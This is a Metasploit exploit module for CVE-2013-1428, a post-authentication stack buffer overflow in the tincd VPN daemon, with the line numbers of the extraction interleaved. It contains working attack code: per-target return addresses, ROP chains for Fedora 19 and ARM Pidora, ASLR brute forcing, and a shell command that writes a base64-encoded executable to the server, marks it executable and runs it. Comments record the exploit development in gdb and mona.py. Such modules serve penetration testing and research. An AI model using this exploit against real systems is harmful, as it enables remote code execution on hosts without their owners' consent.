1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
require 'securerandom'
7

8
class MetasploitModule < Msf::Exploit::Remote
9
  Rank = AverageRanking
10

11
  include Msf::Exploit::EXE
12
  include Msf::Exploit::Remote::TincdExploitClient
13

14
  def initialize(info = {})
15
    super(
16
      update_info(
17
        info,
18
        'Name' => 'Tincd Post-Authentication Remote TCP Stack Buffer Overflow',
19
        'Description' => %q{
20
          This module exploits a stack buffer overflow in Tinc's tincd
21
          service. After authentication, a specially crafted tcp packet (default port 655)
22
          leads to a buffer overflow and allows to execute arbitrary code. This module has
23
          been tested with tinc-1.1pre6 on Windows XP (custom calc payload) and Windows 7
24
          (windows/meterpreter/reverse_tcp), and tinc version 1.0.19 from the ports of
25
          FreeBSD 9.1-RELEASE # 0 and various other OS, see targets. The exploit probably works
26
          for all versions <= 1.1pre6.
27
          A manually compiled version (1.1.pre6) on Ubuntu 12.10 with gcc 4.7.2 seems to
28
          be a non-exploitable crash due to calls to __memcpy_chk depending on how tincd
29
          was compiled. Bug got fixed in version 1.0.21/1.1pre7. While writing this module
30
          it was recommended to the maintainer to start using DEP/ASLR and other protection
31
          mechanisms.
32
        },
33
        'Author' => [
34
          # PoC changes (mostly reliability), port python to ruby, exploitation including ROP, support for all OS, metasploit module
35
          'Tobias Ospelt', # @floyd_ch
36
          # original finding, python PoC crash
37
          'Martin Schobert' # @nitram2342
38
        ],
39
        'References' => [
40
          ['CVE', '2013-1428'],
41
          ['OSVDB', '92653'],
42
          ['BID', '59369'],
43
          ['URL', 'http://www.floyd.ch/?p=741'],
44
          ['URL', 'http://sitsec.net/blog/2013/04/22/stack-based-buffer-overflow-in-the-vpn-software-tinc-for-authenticated-peers/']
45
        ],
46
        'DefaultOptions' => {
47
          'EXITFUNC' => 'process'
48
        },
49
        'Payload' => {
50
          'Space' => 1675,
51
          'DisableNops' => true
52
        },
53
        'Privileged' => true,
54
        'Targets' => [
55
          # full exploitation x86:
56
          ['Windows XP x86, tinc 1.1.pre6 (exe installer)', { 'Platform' => 'win', 'Ret' => 0x0041CAA6, 'offset' => 1676 }],
57
          ['Windows 7 x86, tinc 1.1.pre6 (exe installer)', { 'Platform' => 'win', 'Ret' => 0x0041CAA6, 'offset' => 1676 }],
58
          ['FreeBSD 9.1-RELEASE # 0 x86, tinc 1.0.19 (ports)', { 'Platform' => 'bsd', 'Ret' => 0x0804BABB, 'offset' => 1676 }],
59
          [
60
            'Fedora 19 x86 ROP (NX), write binary to disk payloads, tinc 1.0.20 (manual compile)', {
61
              'Platform' => 'linux', 'Arch' => ARCH_X86, 'Ret' => 0x4d10ee87, 'offset' => 1676
62
            }
63
          ],
64
          [
65
            'Fedora 19 x86 ROP (NX), CMD exec payload, tinc 1.0.20 (manual compile)', {
66
              'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Ret' => 0x4d10ee87, 'offset' => 1676
67
            }
68
          ],
69
          ['Archlinux 2013.04.01 x86, tinc 1.0.20 (manual compile)', { 'Platform' => 'linux', 'Ret' => 0x08065929, 'offset' => 1676 }],
70
          ['OpenSuse 11.2 x86, tinc 1.0.20 (manual compile)', { 'Platform' => 'linux', 'Ret' => 0x0804b07f, 'offset' => 1676 }],
71
          # full exploitation ARM:
72
          [
73
            'Pidora 18 ARM ROP(NX)/ASLR brute force, write binary to disk payloads, tinc 1.0.20 (manual compile with restarting daemon)', {
74
              'Platform' => 'linux', 'Arch' => ARCH_ARMLE, 'Ret' => 0x00015cb4, 'offset' => 1668
75
            }
76
          ],
77
          [
78
            'Pidora 18 ARM ROP(NX)/ASLR brute force, CMD exec payload, tinc 1.0.20 (manual compile with restarting daemon)', {
79
              'Platform' => 'linux', 'Arch' => ARCH_CMD, 'Ret' => 0x00015cb4, 'offset' => 1668
80
            }
81
          ],
82
          # crash only:
83
          ['Crash only: Ubuntu 12.10 x86, tinc 1.1.pre6 (apt-get or manual compile)', { 'Platform' => 'linux', 'Ret' => 0x0041CAA6, 'offset' => 1676 }],
84
          ['Crash only: Fedora 16 x86, tinc 1.0.19 (yum)', { 'Platform' => 'linux', 'Ret' => 0x0041CAA6, 'offset' => 1676 }],
85
          ['Crash only: OpenSuse 11.2 x86, tinc 1.0.16 (rpm package)', { 'Platform' => 'linux', 'Ret' => 0x0041CAA6, 'offset' => 1676 }],
86
          ['Crash only: Debian 7.3 ARM, tinc 1.0.19 (apt-get)', { 'Platform' => 'linux', 'Ret' => 0x9000, 'offset' => 1668 }]
87
        ],
88
        'DisclosureDate' => '2013-04-22', # finding, msf module: Dec 2013
89
        'DefaultTarget' => 0,
90
        'Notes' => {
91
          'Reliability' => UNKNOWN_RELIABILITY,
92
          'Stability' => UNKNOWN_STABILITY,
93
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
94
        }
95
      )
96
    )
97

98
    register_options(
99
      [ # Only for shellcodes that write binary to disk
100
        # Has to be short, usually either . or /tmp works
101
        # /tmp could be mounted as noexec
102
        # . is usually only working if tincd is running as root
103
        OptString.new('BINARY_DROP_LOCATION', [false, 'Short location to drop executable on server, usually /tmp or .', '/tmp']),
104
        OptInt.new('BRUTEFORCE_TRIES', [false, 'How many brute force tries (ASLR brute force)', 200]),
105
        OptInt.new('WAIT', [false, 'Waiting time for server daemon restart (ASLR brute force)', 3])
106
      ], self
107
    )
108
  end
109

110
  def exploit
111
    # #
112
    # x86
113
    # #
114
    # WINDOWS XP and 7 full exploitation
115
    # Simple, we only need some mona.py magic
116
    # C:\Program Files\tinc>"C:\Program Files\Immunity Inc\Immunity Debugger\ImmunityDebugger.exe" "C:\Program Files\tinc\tincd.exe -D -d 5"
117
    # !mona config -set workingfolder c:\logs\%p
118
    # !mona pc 1682
119
    #  --> C:\logs\tincd\pattern
120
    # !mona findmsp
121
    # Straight forward, when we overwrite EIP the second value
122
    # on the stack is pointing to our payload.
123
    # !mona findwild -o -type instr -s "pop r32# ret"
124

125
    # FREEBSD full exploitation
126
    # Same offset as windows, same exploitation method
127
    # But we needed a new pop r32# ret for the freebsd version
128
    # No mona.py help on bsd or linux so:
129
    # - Dumped .text part of tincd binary in gdb
130
    # - Search in hex editor for opcodes for "pop r32# ret":
131
    #  58c3, 59c3, ..., 5fc3
132
    # - Found a couple of 5dc3. ret = start of .text + offset in hex editor
133
    # - 0x0804BABB works very well
134

135
    # UBUNTU crash only
136
    # Manually compiled version (1.1.pre6) on Ubuntu 12.10 with gcc 4.7.2 seems to be a non-exploitable crash, because
137
    # the bug is in a fixed size (MAXSIZE) struct member variable. The size of the destination is known
138
    # at compile time. gcc is introducing a call to __memcpy_chk:
139
    # http://gcc.gnu.org/svn/gcc/branches/cilkplus/libssp/memcpy-chk.c
140
    # memcpy_chk does a __chk_fail call if the destination buffer is smaller than the source buffer. Therefore it will print
141
    # *** buffer overflow detected *** and terminate (SIGABRT). The same result for tincd 10.0.19 which can be installed
142
    # from the repository. It might be exploitable for versions compiled with an older version of gcc.
143
    # memcpy_chk seems to be in gcc since 2005:
144
    # http://gcc.gnu.org/svn/gcc/branches/cilkplus/libssp/memcpy-chk.c
145
    # http://gcc.gnu.org/git/?p=gcc.git;a=history;f=libssp/memcpy-chk.c;hb=92920cc62318e5e8b6d02d506eaf66c160796088
146

147
    # OPENSUSE
148
    # OpenSuse 11.2
149
    # Installation as described on the tincd website. For 11.2 there are two versions.
150
    # Decided for 1.0.16 as this is a vulnerable version
151
    # wget "http://download.opensuse.org/repositories/home:/seilerphilipp/SLE_11_SP2/i586/tinc-1.0.16-3.1.i586.rpm"
152
    # rpm -i tinc-1.0.16-3.1.i586.rpm
153
    # Again, strace shows us that the buffer overflow was detected (see Ubuntu)
154
    # writev(2, [{"*** ", 4}, {"buffer overflow detected", 24}, {" ***: ", 6}, {"tincd", 5}, {" terminated\n", 12}], 5) = 51
155
    # So a crash-only non-exploitable bof here. So let's go for manual install:
156
    # wget 'http://www.tinc-vpn.org/packages/tinc-1.0.20.tar.gz'
157
    # yast -i gcc zlib zlib-devel && echo "yast is still ugly" && zypper install lzo-devel libopenssl-devel make && make && make install
158
    # Exploitable. Let's see:
159
    # tincd is mapped at 0x8048000. There is a 5d3c at offset 307f in the tincd binary. this means:
160
    # the offset to pop ebp; ret is 0x0804b07f
161

162
    # FEDORA
163
    # Fedora 16
164
    # yum has version 1.0.19
165
    # yum install tinc
166
    # Non-exploitable crash, see Ubuntu. Strace tells us:
167
    # writev(2, [{"*** ", 4}, {"buffer overflow detected", 24}, {" ***: ", 6}, {"tincd", 5}, {" terminated\n", 12}], 5) = 51
168
    # About yum: Fedora 17 has fixed version 1.0.21, Fedora 19 fixed version 1.0.23
169
    # Manual compile went on with Fedora 19
170
    # wget 'http://www.tinc-vpn.org/packages/tinc-1.0.20.tar.gz'
171
    # yum install gcc zlib-devel.i686 lzo-devel.i686 openssl-devel.i686 && ./configure && make && make install
172
    # Don't forget to stop firewalld for testing, as the port is still closed otherwise
173
    # # hardening-check tincd
174
    # tincd:
175
    #  Position Independent Executable: no, normal executable!
176
    #  Stack protected: no, not found!
177
    #  Fortify Source functions: no, only unprotected functions found!
178
    #  Read-only relocations: yes
179
    #  Immediate binding: no, not found!
180
    # Running this module with target set to Windows:
181
    # Program received signal SIGSEGV, Segmentation fault.
182
    # 0x0041caa6 in ?? ()
183
    # well and that's our windows offset...
184
    # (gdb) info proc mappings
185
    # 0x8048000  0x8068000    0x20000        0x0 /usr/local/sbin/tincd
186
    # After finding a normal 5DC3 (pop ebp# ret) at offset 69c3 of the binary we
187
    # can try to execute the payload on the stack, but:
188
    # (gdb) stepi
189
    # Program received signal SIGSEGV, Segmentation fault.
190
    # 0x08e8ee08 in ?? ()
191
    # Digging deeper we find:
192
    # dmesg | grep protection
193
    # [    0.000000] NX (Execute Disable) protection: active
194
    # or:
195
    # # objdump -x /usr/local/sbin/tincd
196
    # [...] STACK off    0x00000000 vaddr 0x00000000 paddr 0x00000000 align 2**4
197
    #       filesz 0x00000000 memsz 0x00000000 flags rw-
198
    # or: https://bugzilla.redhat.com/show_bug.cgi?id=996365
199
    # Time for ROP
200
    # To start the ROP we need a POP r32# POP ESP# RET (using the first four bytes of the shellcode
201
    # as a pointer to instructions). Was lucky after some searching:
202
    # (gdb) x/10i 0x4d10ee87
203
    #    0x4d10ee87:  pop    %ebx
204
    #    0x4d10ee88:  mov    $0xf5d299dd,%eax
205
    #    0x4d10ee8d:  rcr    %cl,%al
206
    #    0x4d10ee8f:  pop    %esp
207
    #    0x4d10ee90:  ret
208

209
    # ARCHLINUX
210
    # archlinux-2013.04.01 pacman has fixed version 1.0.23, so went for manual compile:
211
    # wget 'http://www.tinc-vpn.org/packages/tinc-1.0.20.tar.gz'
212
    # pacman -S gcc zlib lzo openssl make && ./configure && make && make install
213
    # Offset in binary to 58c3: 0x1D929 + tincd is mapped at starting address 0x8048000
214
    # -->Ret: 0x8065929
215
    # No NX protection, it simply runs the shellcode :)
216

217
    # #
218
    # ARM
219
    # #
220
    # ARM Pidora 18 (Raspberry Pi Fedora Remix) on a physical Raspberry Pi
221
    # Although this is more for the interested reader, as Pidora development
222
    # already stopped... Raspberry Pi's are ARM1176JZF-S (700 MHz) CPUs
223
    # meaning it's an ARMv6 architecture
224
    # yum has fixed version 1.0.21, so went for manual compile:
225
    # wget 'http://www.tinc-vpn.org/packages/tinc-1.0.20.tar.gz'
226
    # yum install gdb gcc zlib-devel lzo-devel openssl-devel && ./configure && make && make install
227
    # Is the binary protected?
228
    # wget "http://www.trapkit.de/tools/checksec.sh" && chmod +x checksec.sh
229
    # # ./checksec.sh --file /usr/local/sbin/tincd
230
    # RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
231
    # No RELRO        No canary found   NX enabled    No PIE          No RPATH   No RUNPATH   /usr/local/sbin/tincd
232
    # so again NX... but what about the system things?
233
    #  cat /proc/sys/kernel/randomize_va_space
234
    # 2
235
    # --> "Randomize the positions of the stack, VDSO page, shared memory regions, and the data segment.
236
    #      This is the default setting."
237
    # Here some examples of the address of the system function:
238
    # 0xb6c40848
239
    # 0xb6cdd848
240
    # 0xb6c7c848
241
    # Looks like we would have to brute force one byte
242
    # (gdb) info proc mappings
243
    #  0x8000    0x23000    0x1b000          0         /usr/local/sbin/tincd
244
    # 0x2b000    0x2c000     0x1000    0x1b000         /usr/local/sbin/tincd
245
    # When we exploit we get the following:
246
    # Program received signal SIGSEGV, Segmentation fault.
247
    # 0x90909090 in ?? ()
248
    # ok, finally a different offset to eip. Let's figure it out:
249
    # $ tools/pattern_create.rb 1676
250
    # Ok, pretty close, it's 1668. If we randomly choose ret as 0x9000 we get:
251
    # (gdb) break *0x9000
252
    # Breakpoint 1 at 0x9000
253
    # See that our shellcode is *on* the stack:
254
    # (gdb) x/10x $sp
255
    # 0xbee14308: 0x00000698 0x00000000 0x00000000 0x00000698
256
    # 0xbee14318: 0x31203731 0x0a323736 0xe3a00002 0xe3a01001 <-- 0xe3a00002 is the start of our shellcode
257
    # 0xbee14328: 0xe3a02006 0xe3a07001
258
    # let's explore the code we can reuse:
259
    # (gdb) info functions
260
    # objdump -d /usr/local/sbin/tincd >assembly.txt
261
    # while simply searching for the bx instruction we were not very lucky,
262
    # but searching for some "pop pc" it's easy to find nice gadgets.
263
    # we can write arguments to the .data section again:
264
    # 0x2b3f0->0x2b4ac at 0x0001b3f0: .data ALLOC LOAD DATA HAS_CONTENTS
265
    # The problem is we can not reliably forecast the system function's address, but it's
266
    # only one byte random, therefore we have to brute force it and/or find a memory leak.
267
    # Let's assume it's a restarting daemon:
268
    # create /etc/systemd/system/tincd.service and fill in Restart=restart-always
269

270
    # ARM Debian Wheezy on qemu
271
    # root@debian:~# apt-cache showpkg tinc
272
    # Package: tinc
273
    # Versions:
274
    # 1.0.19-3 (/var/lib/apt/lists/ftp.halifax.rwth-aachen.de_debian_dists_wheezy_main_binary-armhf_Packages)
275
    # nice, that's vulnerable
276
    # apt-get install tinc
277
    # apt-get install elfutils && ln -s /usr/bin/eu-readelf /usr/bin/readelf
278
    # wget "http://www.trapkit.de/tools/checksec.sh" && chmod +x checksec.sh
279
    # # ./checksec.sh --file /usr/sbin/tincd
280
    # RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
281
    # Partial RELRO   Canary found      NX enabled    No PIE          No RPATH   No RUNPATH   /usr/sbin/tincd
282
    # Puh, doesn't look too good for us, NX enabled, Stack canary present and a partial RELRO, I'm not going to cover this one here
283

284
    packet_payload = payload.encoded
285
    # Pidora and Fedora/ROP specific things
286
    if target.name =~ /Pidora 18/ || target.name =~ /Fedora 19/
287
      rop_generator = nil
288
      filename = rand_text_alpha(1)
289
      cd = "cd #{datastore['BINARY_DROP_LOCATION']};"
290
      cd = '' if datastore['BINARY_DROP_LOCATION'] == '.'
291

292
      if target.name =~ /Pidora 18/
293
        print_status('Using ROP and brute force ASLR guesses to defeat NX/ASLR on ARMv6 based Pidora 18')
294
        print_status('This requires a restarting tincd daemon!')
295
        print_status('Warning: This is likely to get tincd into a state where it doesn\'t accept connections anymore')
296
        rop_generator = method(:create_pidora_rop)
297
      elsif target.name =~ /Fedora 19/
298
        print_status('Using ROP to defeat NX on Fedora 19')
299
        rop_generator = method(:create_fedora_rop)
300
      end
301

302
      if target.arch.include? ARCH_CMD
303
        # The CMD payloads are a bit tricky on Fedora. As of december 2013
304
        # some of the generic unix payloads (e.g. reverse shell with awk) don't work
305
        # (even when executed directly in a terminal on Fedora)
306
        # use generic/custom and specify PAYLOADSTR without single quotes
307
        # it's usually sh -c *bla*
308
        packet_payload = create_fedora_rop(payload.encoded.split(' ', 3))
309
      else
310
        # the binary drop payloads
311
        packet_payload = get_cmd_binary_drop_payload(filename, cd, rop_generator)
312
        if packet_payload.length > target['offset']
313
          print_status("Plain version too big (#{packet_payload.length}, max. #{target['offset']}), trying zipped version")
314
          packet_payload = get_gzip_cmd_binary_drop_payload(filename, cd, rop_generator)
315
          vprint_status("Achieved version with #{packet_payload.length} bytes")
316
        end
317
      end
318
    end
319

320
    if packet_payload.length > target['offset']
321
      fail_with(Failure::BadConfig, "The resulting payload has #{packet_payload.length} bytes, we only have #{target['offset']} space.")
322
    end
323
    injection = packet_payload + rand_text_alpha(target['offset'] - packet_payload.length) + [target.ret].pack('V')
324

325
    vprint_status("Injection starts with #{injection.unpack('H*')[0][0..30]}...")
326

327
    if target.name =~ /Pidora 18/
328
      # we have to brute force to defeat ASLR
329
      datastore['BRUTEFORCE_TRIES'].times do
330
        print_status("Try #{n}: Initializing tinc exploit client (setting up ciphers)")
331
        setup_ciphers
332
        print_status('Telling tinc exploit client to connect, handshake and send the payload')
333
        begin
334
          send_recv(injection)
335
        rescue RuntimeError, Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, ::Timeout::Error, ::EOFError => runtime_error
336
          print_error(runtime_error.message)
337
          print_error(runtime_error.backtrace.join("\n\t"))
338
        rescue Rex::ConnectionRefused
339
          print_error('Server refused connection. Is this really a restarting daemon? Try higher WAIT option.')
340
          sleep(3)
341
          next
342
        end
343
        secs = datastore['WAIT']
344
        print_status("Waiting #{secs} seconds for server to restart daemon (which will change the ASLR byte)")
345
        sleep(secs)
346
      end
347
      print_status("Brute force with #{datastore['BRUTEFORCE_TRIES']} tries done. If not successful you could try again.")
348
    else
349
      # Setup local ciphers
350
      print_status('Initializing tinc exploit client (setting up ciphers)')
351
      setup_ciphers
352
      # The tincdExploitClient will do the crypto handshake with the server and
353
      # send the injection (a packet), where the actual buffer overflow is triggered
354
      print_status('Telling tinc exploit client to connect, handshake and send the payload')
355
      send_recv(injection)
356
    end
357
    print_status('Exploit finished')
358
  end
359

360
  def get_cmd_binary_drop_payload(filename, cd, rop_generator)
361
    elf_base64 = Rex::Text.encode_base64(generate_payload_exe)
362
    cmd = ['/bin/sh', '-c', "#{cd}echo #{elf_base64}|base64 -d>#{filename};chmod +x #{filename};./#{filename}"]
363
    vprint_status("You will try to execute #{cmd.join(' ')}")
364
    rop_generator.call(cmd)
365
  end
366

367
  def get_gzip_cmd_binary_drop_payload(filename, cd, rop_generator)
368
    elf_zipped_base64 = Rex::Text.encode_base64(Rex::Text.gzip(generate_payload_exe))
369
    cmd = ['/bin/sh', '-c', "#{cd}echo #{elf_zipped_base64}|base64 -d|gunzip>#{filename};chmod +x #{filename};./#{filename}"]
370
    vprint_status("You will try to execute #{cmd.join(' ')}")
371
    rop_generator.call(cmd)
372
  end
373

374
  def create_pidora_rop(sys_execv_args)
375
    sys_execv_args = sys_execv_args.join(' ')
376
    sys_execv_args += "\x00"
377

378
    aslr_byte_guess = SecureRandom.random_bytes(1).ord
379
    print_status("Using 0x#{aslr_byte_guess.to_s(16)} as random byte for ASLR brute force (hope the server will use the same at one point)")
380

381
    # Gadgets tincd
382
    # c714:	e1a00004 	mov	r0, r4
383
    # c718:	e8bd8010 	pop	{r4, pc}
384
    mov_r0_r4_pop_r4_ret = [0x0000c714].pack('V')
385
    pop_r4_ret = [0x0000c718].pack('V')
386
    # 1cef4:	e580400c 	str	r4, [r0, #12]
387
    # 1cef8:	e8bd8010 	pop	{r4, pc}
388
    # mov_r0_plus_12_to_r4_pop_r4_ret = [0x0001cef4].pack('V')
389

390
    # bba0:	e5843000 	str	r3, [r4]
391
    # bba4:	e8bd8010 	pop	{r4, pc}
392
    mov_to_r4_addr_pop_r4_ret = [0x0000bba0].pack('V')
393

394
    # 13ccc:	e1a00003 	mov	r0, r3
395
    # 13cd0:	e8bd8008 	pop	{r3, pc}
396
    pop_r3_ret = [0x00013cd0].pack('V')
397

398
    # address to start rop (removing 6 addresses of garbage from stack)
399
    # 15cb4:	e8bd85f0 	pop	{r4, r5, r6, r7, r8, sl, pc}
400
    # start_rop = [0x00015cb4].pack('V')
401
    # see target Ret
402

403
    # system function address base to brute force
404
    # roughly 500 tests showed addresses between
405
    # 0xb6c18848 and 0xb6d17848 (0xff distance)
406
    system_addr = [0xb6c18848 + (aslr_byte_guess * 0x1000)].pack('V')
407

408
    # pointer into .data section
409
    loc_dot_data = 0x0002b3f0 # a location inside .data
410

411
    # Rop into system(), prepare address of payload in r0
412
    rop = ''
413

414
    # first, let's put the payload into the .data section
415

416
    # Put the first location to write to in r4
417
    rop += pop_r4_ret
418

419
    sys_execv_args.scan(/.{1,4}/).each_with_index do |argument_part, i|
420
      # Give location inside .data via stack
421
      rop += [loc_dot_data + i * 4].pack('V')
422
      # Pop 4 bytes of the command into r3
423
      rop += pop_r3_ret
424
      # Give 4 bytes of command on stack
425
      if argument_part.length == 4
426
        rop += argument_part
427
      else
428
        rop += argument_part + rand_text_alpha(4 - argument_part.length)
429
      end
430
      # Write the 4 bytes to the writable location
431
      rop += mov_to_r4_addr_pop_r4_ret
432
    end
433

434
    # put the address of the payload into r4
435
    rop += [loc_dot_data].pack('V')
436

437
    # now move r4 to r0
438
    rop += mov_r0_r4_pop_r4_ret
439
    rop += rand_text_alpha(4)
440
    # we don't care what ends up in r4 now
441

442
    # call system
443
    rop += system_addr
444
  end
445

446
  def create_fedora_rop(sys_execv_args)
447
    # Gadgets tincd
448
    loc_dot_data = 0x80692e0 # a location inside .data
449
    pop_eax = [0x8065969].pack('V') # pop eax; ret
450
    pop_ebx = [0x8049d8d].pack('V') # pop ebx; ret
451
    pop_ecx = [0x804e113].pack('V') # pop ecx; ret
452
    xor_eax_eax = [0x804cd60].pack('V') # xor eax eax; ret
453
    # <ATTENTION> This one destroys ebx:
454
    mov_to_eax_addr = [0x805f2c2].pack('V') + rand_text_alpha(4) # mov [eax] ecx ; pop ebx ; ret
455
    # </ATTENTION>
456

457
    # Gadgets libcrypto.so.10 libcrypto.so.1.0.1e
458
    xchg_ecx_eax = [0x4d170d1f].pack('V') # xchg ecx,eax; ret
459
    # xchg_edx_eax = [0x4d25afa3].pack('V') # xchg edx,eax ; ret
460
    # inc_eax = [0x4d119ebc].pack('V') # inc eax ; ret
461

462
    # Gadgets libc.so.6 libc-2.17.so
463
    pop_edx = [0x4b5d7aaa].pack('V') # pop edx; ret
464
    int_80 = [0x4b6049c5].pack('V') # int 0x80
465

466
    # Linux kernel system call 11: sys_execve
467
    # ROP
468
    rop = ''
469

470
    index = 0
471
    stored_argument_pointer_offsets = []
472

473
    sys_execv_args.each_with_index do |argument, argument_no|
474
      stored_argument_pointer_offsets << index
475
      argument.scan(/.{1,4}/).each_with_index do |argument_part, i|
476
        # Put location to write to in eax
477
        rop += pop_eax
478
        # Give location inside .data via stack
479
        rop += [loc_dot_data + index + i * 4].pack('V')
480
        # Pop 4 bytes of the command into ecx
481
        rop += pop_ecx
482
        # Give 4 bytes of command on stack
483
        if argument_part.length == 4
484
          rop += argument_part
485
        else
486
          rop += argument_part + rand_text_alpha(4 - argument_part.length)
487
        end
488
        # Write the 4 bytes to the writable location
489
        rop += mov_to_eax_addr
490
      end
491
      # We have to end the argument with a zero byte
492
      index += argument.length
493
      # We don't have "xor ecx, ecx", but we have it for eax...
494
      rop += xor_eax_eax
495
      rop += xchg_ecx_eax
496
      # Put location to write to in eax
497
      rop += pop_eax
498
      # Give location inside .data via stack
499
      rop += [loc_dot_data + index].pack('V')
500
      # Write the zeros
501
      rop += mov_to_eax_addr
502
      index += 1 # where we can write the next argument
503
    end
504

505
    # Append address of the start of each argument
506
    stored_argument_pointer_offsets.each do |offset|
507
      rop += pop_eax
508
      rop += [loc_dot_data + index].pack('V')
509
      rop += pop_ecx
510
      rop += [loc_dot_data + offset].pack('V')
511
      rop += mov_to_eax_addr
512
      index += 4
513
    end
514
    # end with zero
515
    rop += xor_eax_eax
516
    rop += xchg_ecx_eax
517

518
    rop += pop_eax
519
    rop += [loc_dot_data + index].pack('V')
520
    rop += mov_to_eax_addr
521

522
    rop += pop_ebx
523
    rop += [loc_dot_data].pack('V')
524

525
    rop += pop_ecx
526
    rop += [loc_dot_data + sys_execv_args.join(' ').length + 1].pack('V')
527

528
    rop += pop_edx
529
    rop += [loc_dot_data + index].pack('V')
530

531
    # sys call 11 = sys_execve
532
    rop += pop_eax
533
    rop += [0x0000000b].pack('V')
534

535
    rop += int_80
536
  end
537
end
538

539